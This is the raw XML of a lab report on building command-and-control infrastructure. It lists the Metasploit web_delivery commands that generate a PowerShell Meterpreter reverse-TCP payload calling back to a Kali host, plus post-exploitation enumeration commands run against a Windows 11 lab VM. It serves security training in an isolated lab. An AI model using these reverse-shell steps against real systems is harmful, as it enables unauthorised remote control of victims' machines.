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jpeg" ContentType="image/jpe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400" w:after="120"/>
        <w:ind w:hanging="0" w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Advanced C2 Lab Report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1. Objective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objective of this lab was to establish a Command-and-Control (C2) infrastructure, generate and deliver a PowerShell payload, establish a remote session with a Windows virtual machine, and perform post-exploitation interaction using a C2 framework.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r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>2. Tools Used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Metasploit Framework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Kali Linux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Windows 11 Virtual Machine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PowerShell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Meterpreter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3. Lab Setup</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8640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>
          <w:trHeight w:val="225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b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Machine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b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Role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b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>IP Address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kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Kali Linux VM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kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>C2 Server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kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>192.168.56.105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kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Windows 11 VM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kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Target Machine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kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>192.168.56.106</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:b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4. C2 Infrastructure Configuration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Metasploit Framework was launched on the Kali Linux virtual machine using the msfconsole interface. The web_delivery module was configured to generate a PowerShell-based Meterpreter payload for establishing a reverse TCP session between the target machine and the attacker system.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use exploit/multi/script/web_delivery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set TARGET 2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set payload windows/meterpreter/reverse_tcp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set LHOST 192.168.56.105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set LPORT 443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run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206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-28575</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3148965</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="282067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ack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:hanging="0" w:left="0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r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>5. Payload Delivery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generated PowerShell launcher command was copied from Metasploit and executed on the Windows 11 virtual machine using PowerShell with administrative privileges. Upon execution, the target system established a reverse connection back to the Kali Linux C2 server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine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73151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40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>6. Session Establishment and Management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After payload execution, a Meterpreter session was successfully established. Several post-exploitation commands were executed to verify remote access and enumerate system information.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sessions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sessions -i 1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sysinfo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getuid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr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ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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2067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ack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/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2067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BodyText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7. Session Log Table</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8640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b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Session 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b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Target IP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b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Payload Type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b/>
                <w:bCs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kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>SID001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kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>192.168.56.106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kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>PowerShell Meterpreter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hack" w:hAnsi="hack" w:eastAsia="ＭＳ 明朝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ascii="hack" w:hAnsi="hack"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Beacon established successfully</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr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8. Results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Command-and-Control infrastructure was successfully established using Metasploit Framework. A PowerShell-based payload was delivered to the Windows 11 target system, resulting in a successful reverse Meterpreter session. Remote command execution and system enumeration were completed successfully.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9.  Summary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 Command-and-Control infrastructure was established using Metasploit Framework on Kali Linux. A PowerShell-based Meterpreter payload was generated and delivered to a Windows 11 virtual machine through web delivery. After execution, a reverse connection was established successfully, allowing remote session management, system enumeration, and post-exploitation interaction.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10. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2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This lab demonstrated the practical implementation of a Command-and-Control environment using offensive security tools in a controlled lab setting. The activity provided hands-on experience in payload generation, session management, remote access techniques, and post-exploitation operations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/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ack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8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9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2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6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2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7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LibreOffice/24.2.7.2$Linux_X86_64 LibreOffice_project/420$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>5</Pages>
  <Words>364</Words>
  <Characters>2332</Characters>
  <CharactersWithSpaces>2632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2026-05-11T20:29:03Z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